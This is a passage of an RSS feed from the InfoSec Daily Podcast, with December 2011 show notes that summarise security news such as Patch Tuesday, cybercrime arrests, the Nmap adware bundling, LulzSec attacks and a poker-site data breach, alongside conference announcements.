	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Three of the 14 updates were tagged with Microsoft&#39;s &quot;critical&quot; label, the highest threat ranking in its four-step system, while the remaining 11 were marked &quot;important,&quot; the second-highest rating.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Bugs in 10 of the updates could be exploited by attackers to remotely plant attack code on unpatched PCs, Microsoft said in its monthly advance notification that precedes each Patch Tuesday. A number of those bulletins were pegged as important, a move Microsoft makes when the bugs cannot easily be exploited because the pertinent components are not switched on by default or because defensive technologies like ASLR and DEP help protect users.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.darkreading.com/security/attacks-breaches/232300124/the-most-notorious-cybercrooks-of-2011-and-how-they-got-caught.html"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.darkreading.com/security/attacks-breaches/232300124/the-most-notorious-cybercrooks-of-2011-and-how-they-got-caught.html</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While there are plenty of elusive hackers that will forever manage to outrun the law, the good guys scored some impressive arrests, indictments, and convictions in 2011. Here are some of the highest profile cases to hit the headlines this year.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Anonymous and LulzSec Hacker: Ryan Cleary</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Ivy League Academic Content Turbo Downloader: Aaron Swartz</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. DNSchanger Creators: Vladimir Tsastsin, Timur Gerassimenko, Dmitri Jegorov, Valeri Aleksejev, Konstantin Poltev and Anton Ivanvov</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Sony Hacker: Cody Kretsinger</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Anonymous&#39; Inside Man at AT&amp;T: Lance Moore</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6. Apple iPad Snoop: Andrew Auernheimer</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7. Celebrity Hackerazzi: Christopher Chaney</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">8. Gucci Hacker: Sam Chihlung Yin </span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theaustralian.com.au/australian-it/it-jobs/public-sector-it-to-keep-hiring/story-fna12gpc-1226217777373"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theaustralian.com.au/australian-it/it-jobs/public-sector-it-to-keep-hiring/story-fna12gpc-1226217777373</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Australian government is expected to be among the strongest sectors for hiring IT skills next year, according to recruiters.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hiring experts say project managers and business analysts will be sought to lead new projects and focus on process improvement and cost efficiency across state and federal government.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IPads were being implemented as a new tool to aid public sector staff and was fuelling demand for the appropriate skills, Hays IT regional director Peter Noblet said.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;Senior infrastructure project managers will also be needed as the Victorian government continues to centralise IT services,&rsquo;&rsquo; he said.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Client engagement and account managers were also wanted to build strong partnerships between government departments and CenITex, the Victorian shared services agency.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mr Noblet said business intelligence developers, in particular Microsoft and Oracle platforms, were also in demand in the public sector.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;(They are) needed due to the recognised need for BI to assist in management decision-making in addition to the large BI programs that are active across government.&rsquo;&rsquo;</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="https://threatpost.com/en_us/blogs/cnet-apologizes-nmap-adware-bundling-120811"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/cnet-apologizes-nmap-adware-bundling-120811</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officials at Cnet&#39;s Download.com site have issued a statement apologizing for bundling the popular open source Nmap security audit application with adware that changed users&#39; search engine and home page to Microsoft properties. Fyodor, the author of Nmap, raised the issue earlier this week, saying that his app was being wrapped in malware on Download.com.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s not unusual for download sites to bundle free applications with some kind of adware or toolbar, but the creators of open-source applications take a dim view of this practice, given the nature and ethic of open source projects. Nmap is a venerable and widely used tool for mapping networks and performing security audits and Fyodor wrote in a </span><a href="http://seclists.org/nmap-hackers/2011/5"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">message to an Nmap mailing list</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> earlier this week that Download.com, which is part of Cnet, a subsidiary of CBS Interactive, was bundling the application with its installer, which, if a user agreed, would install a search toolbar and change the user&#39;s search engine to Bing.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The way it works is that C|Net&#39;s download page (screenshot attached) offers what they claim to be Nmap&#39;s Windows installer. They even provide the correct file size for our official installer. But users actually get a Cnet-created trojan installer. That program does the dirty work before downloading and executing Nmap&#39;s real installer. Of course the problem is that users often just click through installer screens, trusting that download.com gave them the real installer and knowing that the Nmap project wouldn&#39;t put malicious code in our installer. Then the next time the user opens their browser, they find that their computer is hosed with crappy toolbars, Bing searches, Microsoft as their home page, and whatever other shenanigans the software performs! The worst thing is that users will think we (Nmap Project) did this to them!&quot; Fyodor wrote in his original message.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.cioupdate.com/technology-trends/fortinets-top-8-security-predictions-for-2012.html"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.cioupdate.com/technology-trends/fortinets-top-8-security-predictions-for-2012.html</span></a></p>
<p>
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Looking back on 2011, </span><a href="http://www.fortiguard.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">FortiGuard Labs</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the research arm of </span><a href="http://www.fortinet.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Fortinet</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the &nbsp;saw a number of landmark developments in the world of network security. Huge botnets such as DNS Changer and Coreflood were permanently taken off line, 64-bit rootkits advanced (TDSS), source code was leaked for the Zeus and SpyEye botnets , and Anonymous hacktivists raised their profile by taking down major banks offline and threatening to go after a critical infrastructure and even drug cartels in Mexico.</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many of these events our team predicted in their &ldquo;Top 5 Security Predictions for 2011,&rdquo; while others, such as legislation to potentially jail and fine individuals who had malicious code stored on computer systems were more surprising. </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2012 promises to be even more worrisome. After gazing into FortiCrystalball this month, FortiGuard Labs saw eight network security trends that could happen in the coming year. &nbsp;In short, the Labs are predicting a rise of mobile malware (with new worms and polymorphism), increased crackdowns on network run money laundering operations, &nbsp;renewed and successful collaboration between government and the private sectors, discoveries of exploitable SCADA vulnerabilities, an increase in sponsored attacks, and Anonymous hacktivists using their powers for good over evil. &nbsp;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 1: Ransomware will take mobile devices hostage </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 2: Worming into Android </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 3: Polymorphism want a cracker?</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 4: Clampdown on network-based money laundering </span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prediction No. 5: Public-Private Relationships in security </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-541-lulzsec-is-back-ms-14-patches-aussie%e2%80%99s-hiring-top-2011-hacks-cnet-apology-predictions/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3249/0/infosec-daily-podcast-episode-541.mp3" length="19890195" type="audio/mpeg" />
		<itunes:duration>0:41:23</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 541 for December 8, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 541 for December 8, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.darkreading.com/security/attacks-breaches/232300133/resurgent-lulzsec-attacks-government-sites-in-portugal.html

	The hacktivist group LulzSec was back in action last week, launching distributed denial-of-service (DDoS) attacks on government websites in Portugal.
	The group says it was driven to the attacks by Portuguese austerity measures, social inequalities, and recent police violence against demonstrators during a protest on Nov. 24, according to news reports.
	On Friday, LulzSec Portugal launched a DDoS attack against the website of Banco de Portugal (Bank of Portugal), making the site inaccessible, according to the reports. In addition to taking down the Bank of Portugal website, LulzSec Portugal has been credited with successful attacks on numerous state services. Earlier this week, LulzSec disabled the websites of the Portugal House of Parliament, several political parties, and the national police.
	Last Sunday, LulzSec Portugal released the name, rank, identification number, contact information, and employment history for more than 100 national police officers believed to have taken part in the police. &#34;2011 is the year of revolutions and the biggest hacks in history (until now ..),&#34; the group said in an online statement. &#34;We are creating a way for the revolution global.&#34;
	&#160;
Source: &#160;http://www.computerworld.com/s/article/9222530/Update_Microsoft_plans_20_patches_next_week_will_fix_Duqu_and_BEAST_bugs

	Microsoft today announced it will issue 14 security bulletins next week to patch 20 vulnerabilities in Windows, Internet Explorer (IE), Office, and Windows Media Player.
	Among the patches will be ones that plug the hole used by the Duqu intelligence-gathering Trojan, and fix the SSL (secure socket layer) 3.0 and TLS (transport layer security) 1.0 bug popularized three months ago by the BEAST, for &#34;Browser Exploit Against SSL/TLS,&#34; hacking tool[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 540 &#8211; Ultimate Bet, Lucky Supermarket, Cuckold Hacking, Lockheed-Martin Targeted &amp; Insider Psychology</title>
		<link>http://www.isdpodcast.com/episode-540-ultimate-bet-lucky-supermarket-cuckold-hacking-lockheed-martin-targeted-insider-psychology</link>
		<comments>http://www.isdpodcast.com/episode-540-ultimate-bet-lucky-supermarket-cuckold-hacking-lockheed-martin-targeted-insider-psychology#comments</comments>
		<pubDate>Thu, 08 Dec 2011 01:57:47 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3245</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 540 for December 7, 2011. &#160;&#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 540 for December 7, 2011. &nbsp;&nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Geordy Rostad, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ISC2 Offical Results: @WIMREMES WINS!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://threatpost.com/en_us/blogs/personal-information-35-million-poker-players-spilled-online-120611"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/personal-information-35-million-poker-players-spilled-online-120611</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Customers of the online poker Website Ultimate Bet (UB) are the victims of a data breach that spilled the private information of up to 3.5 million of its customers online over the weekend.</span></p>
<p>&nbsp;</p>
